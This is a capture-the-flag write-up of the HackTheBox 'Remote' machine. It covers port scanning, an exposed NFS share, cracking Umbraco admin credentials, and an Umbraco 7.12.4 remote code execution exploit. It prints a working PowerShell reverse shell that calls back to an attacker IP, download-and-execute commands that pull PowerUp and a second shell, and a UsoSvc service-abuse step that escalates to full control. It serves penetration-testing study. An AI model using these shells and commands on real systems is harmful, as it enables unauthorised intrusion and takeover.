1. HackTheBox. Level Easy: Passing Remote. NFS, RCE in CMS Umbraco and LPE via UsoSvc

5 December 2024 5 minutes Author: Lady Liberty

“How to Find Vulnerabilities in CMS Umbraco and Gain Access to the System” is a step-by-step guide for cybersecurity professionals and pentesting enthusiasts. The article describes how to investigate open ports, analyze network services (including NFS), find configuration files and credentials, and exploit vulnerabilities in CMS Umbraco.

Step-by-step penetration through vulnerabilities in CMS Umbraco

The article investigates an NFS resource, analyzes a remote code execution (RCE) exploit in the Umbraco CMS, and studies a privilege escalation (LPE) vector via UsoSvc using PowerUp.

The connection to the lab is via VPN. For security reasons, it is not recommended to use work computers or devices that store sensitive data, as the connection is to a private network where information security specialists work.

Recon

The machine is assigned an IP address of 10.10.10.180, which we add to the /etc/hosts file.

10.10.10.180 	remote.htb

First, a scan of open ports is performed. To speed up the process, masscan is used, since scanning all ports with nmap takes longer. All TCP and UDP ports are scanned through the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.180 --rate=500

There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.

nmap remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21

Port 111 is responsible for NFS (allows you to mount remote file systems over the network). Let’s look at the list of resources.

We have available resources, let’s mount this resource.

This directory contains the Web.config file and the Umbraco folder. Umbraco is an open source content management system platform.

So, we need to look at all the configs, and also find out the Umbraco version. Here’s what you can note in Web.Config.

We find the smtp credentials and the Umbraco version: 7.12.4. The cortex is vulnerable if the credentials are present.

Entry Point

Next, all files and directories on the remote server are retrieved to identify and analyze files that may be useful for further investigation.

ls -lR ./

After narrowing down the files, they are reviewed. The grep command is used to quickly find key data, in particular to detect lines containing words such as user, login, pass, vers, etc. As a result of this analysis, information about the existence of two users was discovered.

After that, we go through grep again looking for the lines admin and ssmith. And we find the hashes of the user data.

And we successfully crack the administrator password.

A ready-made exploit can be found in the exploit-db database, but its correct use requires minor modification according to the specific conditions of the target system.

USER

First, the exploit specifies the credentials and host address required for its execution.

The second stage modifies the exploit payload by specifying the executable file and its parameters. In this case, the ping command is used for testing.

Once the program runs, we will see ICMP packets in tcpdump.

We load the following reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.15.60',4321)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()

Let’s save it in shell.ps1, and run the http server on the local machine.

sudo python3 -m http.server

Let’s change the load.

And after executing, we will get a backconnection:

ROOT

During analysis of user information, a privilege was discovered that could be used to further escalate access rights.

Since you are using Windows Server 2019, the method using the Elevation of Privilege Token (LPE) impersonator is invalid.

Let’s use PowerUp to find the LPE vector. Let’s load it from the local host and perform a full check.

iex (New-Object Net.WebClient).DownloadString('http://10.10.15.60/tools/PowerUp.ps1');Invoke-AllChecks

Permission to use the Update Orchestrator Service, a service responsible for organizing the download, installation, and verification of Windows updates, has been detected.

For further exploitation, a second shell is created (with a previous port change in the first one), which is loaded onto the target machine to provide access.

wget http://10.10.15.60/shell2.ps1 -O C:\Windows\Temp\shell2.ps1

We start it using UsoSvc.

Invoke-ServiceAbuse -Name UsoSvc -Command "cmd.exe /c powershell C:\Windows\Temp\shell2.ps1"

And we get a backconnect.

Conclusion

This article shows step by step how to find vulnerabilities in the Umbraco CMS and exploit them to gain access to the system. Basic tools are used to scan the network, search for configuration files, and obtain important information such as logins and passwords.

Based on the data found, a remote access exploit is launched, and then a method of elevation of privilege through the Windows Update service is used. Thanks to this, it was possible to take full control of the target machine.

The article will be useful for those who are learning the basics of pentesting or want to understand how to use tools and exploits in real-world situations.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.